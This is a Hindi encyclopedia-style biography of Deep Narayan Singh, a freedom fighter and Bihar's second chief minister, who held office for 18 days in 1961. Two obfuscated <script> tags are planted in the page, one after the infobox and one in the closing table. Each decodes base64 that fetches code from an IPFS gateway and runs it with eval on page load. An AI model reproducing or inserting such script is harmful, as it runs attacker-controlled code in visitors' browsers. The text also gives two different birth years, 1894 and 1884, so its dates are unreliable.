दीप नारायण सिंह
भारत डिस्कवरी प्रस्तुति
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.
दीप नारायण सिंह
| |
पूरा नाम | दीप नारायण सिंह |
जन्म | 25 नवंबर, 1894 |
जन्म भूमि | पुरानतांड, हाजीपुर, बिहार |
मृत्यु | 7 दिसंबर, 1977 |
मृत्यु स्थान | हाजीपुर, बिहार |
पति/पत्नी | ममलता देवी |
नागरिकता | भारतीय |
प्रसिद्धि | राजनीतिज्ञ, स्वाधीनता सेनानी |
पार्टी | भारतीय राष्ट्रीय कांग्रेस |
पद | भूतपूर्व मुख्यमंत्री, बिहार- 1 फ़रवरी 1961 से 18 फ़रवरी 1961 |
संबंधित लेख | बिहार के मुख्यमंत्री |
अन्य जानकारी | दीप नारायण सिंह भारतीय संविधान सभा के सदस्य थे, जो संविधान लिखने के लिए चुने गए थे। |
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>दीप नारायण सिंह (अंग्रेज़ी: Deep Narayan Singh, जन्म- 25 नवंबर, 1894, हाजीपुर, बिहार; मृत्यु- 7 दिसंबर, 1977, हाजीपुर) बिहार के दूसरे मुख्यमंत्री थे, लेकिन वे केवल 18 दिन तक ही पद पर रह पाए। वे 1 फ़रवरी, 1961 को सीएम पद पर चुने गए और 18 फ़रवरी को पद से हट गए।
- बिहार केसरी कृष्ण सिंह के मृत्युपरांत भारतीय राष्ट्रीय कांग्रेस ने दीप नारायण सिंह को बिहार के मुख्यमंत्री पद पर नियुक्त किया, हालाँकि इनका कार्यकाल मात्र 18 दिनों का ही था। फिर भी भारत और बिहार की जनता इन्हें बिहार के दूसरे मुख्यमंत्री के रूप में सदा याद रखेगी।
- दीप नारायण सिंह का जन्म 1884 ई. में बिहार राज्य के हाजीपुर के पुरानतांड इलाके में हुआ था। वह भारतीय स्वाधीनता संग्राम के एक अग्रज सेनानी और स्वाधीन भारत के बिहार के दूसरे मुख्यमंत्री थे।
- वह भारतीय संविधान सभा के सदस्य थे, जो संविधान लिखने के लिए चुने गए थे।
- स्वतंत्र भारत में पहले भारतीय संसद के एक अहम् हिस्से रूप में भी दीप नारायण सिंह ने काम किया तथा बिहार विधानसभा के सदस्य भी रहे।
- दीप नारायण सिंह की मृत्यु 7 दिसंबर, 1977 को हाजीपुर में हो गई। उनके संविधान निर्माण तथा अन्य क्षेत्रों एवं बिहार के दूसरे मुख्यमंत्री के रूप में दिए गए उनके योगदानों को याद करते हुए तत्कालीन आर्कियोलोजि डायरेक्टर द्वारा उनके नाम पर हाजीपुर में एक संग्रहालय का निर्माण करवाया गया।
|
|
|
|
|
टीका टिप्पणी और संदर्भ
बाहरी कड़ियाँ
संबंधित लेख
क्रमांक | राज्य | मुख्यमंत्री | तस्वीर | पार्टी | पदभार ग्रहण |
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>